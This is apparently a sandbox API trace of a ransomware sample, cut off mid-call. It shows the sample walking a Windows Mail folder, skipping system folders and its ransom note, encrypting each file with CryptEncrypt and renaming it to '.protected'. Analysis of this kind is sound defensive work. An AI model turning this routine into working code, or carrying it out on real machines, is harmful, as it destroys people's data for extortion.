[0085.297] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffa1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.297] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x5e4, lpOverlapped=0x0) returned 1 [0085.297] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.298] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.298] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.298] CloseHandle (hObject=0x14c) returned 1 [0085.298] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.protected") returned 136 [0085.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.protected")) returned 1 [0085.299] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.299] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Windows") returned -1 [0085.299] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Program Files") returned -1 [0085.299] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="Program Files (x86)") returned -1 [0085.299] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="$Recycle.bin") returned 1 [0085.299] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="System Volume Information") returned -1 [0085.299] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 126 [0085.299] StrStrIW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".protected") returned 0x0 [0085.299] lstrcmpW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0085.299] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.299] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.300] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 126 [0085.300] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".txt") returned 0x0 [0085.300] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 126 [0085.300] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".rar") returned 0x0 [0085.300] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 126 [0085.300] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".zip") returned 0x0 [0085.300] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2a0, lpOverlapped=0x0) returned 1 [0085.301] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffd60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.301] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2a0, lpOverlapped=0x0) returned 1 [0085.302] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.302] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.302] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.302] CloseHandle (hObject=0x14c) returned 1 [0085.302] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.protected") returned 136 [0085.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.protected")) returned 1 [0085.303] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.303] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Windows") returned -1 [0085.303] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Program Files") returned -1 [0085.303] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="Program Files (x86)") returned -1 [0085.303] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="$Recycle.bin") returned 1 [0085.303] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="System Volume Information") returned -1 [0085.303] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 126 [0085.303] StrStrIW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".protected") returned 0x0 [0085.303] lstrcmpW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2="RESTORE_FILES.txt") returned -1 [0085.303] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.303] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 126 [0085.304] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".txt") returned 0x0 [0085.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 126 [0085.304] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".rar") returned 0x0 [0085.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 126 [0085.304] StrStrW (lpFirst="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpSrch=".zip") returned 0x0 [0085.304] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x6c8, lpOverlapped=0x0) returned 1 [0085.306] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff938, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.306] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x6c8, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x6c8, lpOverlapped=0x0) returned 1 [0085.306] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.306] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.306] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.307] CloseHandle (hObject=0x14c) returned 1 [0085.307] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.protected") returned 136 [0085.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.protected")) returned 1 [0085.308] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.308] lstrcmpiW (lpString1="Backup", lpString2="Windows") returned -1 [0085.308] lstrcmpiW (lpString1="Backup", lpString2="Program Files") returned -1 [0085.308] lstrcmpiW (lpString1="Backup", lpString2="Program Files (x86)") returned -1 [0085.308] lstrcmpiW (lpString1="Backup", lpString2="$Recycle.bin") returned 1 [0085.308] lstrcmpiW (lpString1="Backup", lpString2="System Volume Information") returned -1 [0085.308] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned 77 [0085.308] lstrcmpW (lpString1="Backup", lpString2=".") returned 1 [0085.308] lstrcmpW (lpString1="Backup", lpString2="..") returned 1 [0085.308] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*") returned 79 [0085.308] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.308] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.308] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.308] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.308] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.308] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.308] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\.") returned 79 [0085.308] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.308] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.308] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.308] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.308] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.308] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.308] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.308] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\..") returned 80 [0085.309] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.309] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.309] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.309] lstrcmpiW (lpString1="old", lpString2="Windows") returned -1 [0085.309] lstrcmpiW (lpString1="old", lpString2="Program Files") returned -1 [0085.309] lstrcmpiW (lpString1="old", lpString2="Program Files (x86)") returned -1 [0085.309] lstrcmpiW (lpString1="old", lpString2="$Recycle.bin") returned 1 [0085.309] lstrcmpiW (lpString1="old", lpString2="System Volume Information") returned -1 [0085.309] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old") returned 81 [0085.309] lstrcmpW (lpString1="old", lpString2=".") returned 1 [0085.309] lstrcmpW (lpString1="old", lpString2="..") returned 1 [0085.309] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*") returned 83 [0085.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0085.323] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.323] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.324] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.324] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.324] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.324] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\.") returned 83 [0085.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.324] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.324] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.324] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.324] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.324] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.324] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.324] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\..") returned 84 [0085.324] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.324] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.324] lstrcmpiW (lpString1="edb00001.log", lpString2="Windows") returned -1 [0085.324] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files") returned -1 [0085.324] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files (x86)") returned -1 [0085.324] lstrcmpiW (lpString1="edb00001.log", lpString2="$Recycle.bin") returned 1 [0085.324] lstrcmpiW (lpString1="edb00001.log", lpString2="System Volume Information") returned -1 [0085.324] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 94 [0085.324] StrStrIW (lpFirst="edb00001.log", lpSrch=".protected") returned 0x0 [0085.324] lstrcmpW (lpString1="edb00001.log", lpString2="RESTORE_FILES.txt") returned -1 [0085.324] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.324] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 94 [0085.325] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0085.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 94 [0085.325] StrStrW (lpFirst="edb00001.log", lpSrch=".rar") returned 0x0 [0085.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 94 [0085.325] StrStrW (lpFirst="edb00001.log", lpSrch=".zip") returned 0x0 [0085.325] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.336] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.336] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.337] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.337] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.339] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.339] CloseHandle (hObject=0x154) returned 1 [0085.340] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.protected") returned 104 [0085.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log.protected")) returned 1 [0085.341] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.341] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Windows") returned 1 [0085.341] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files") returned 1 [0085.341] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files (x86)") returned 1 [0085.341] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="$Recycle.bin") returned 1 [0085.341] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="System Volume Information") returned 1 [0085.341] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 108 [0085.341] StrStrIW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".protected") returned 0x0 [0085.341] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="RESTORE_FILES.txt") returned 1 [0085.341] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.341] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 108 [0085.342] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0085.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 108 [0085.342] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".rar") returned 0x0 [0085.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 108 [0085.342] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".zip") returned 0x0 [0085.342] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: 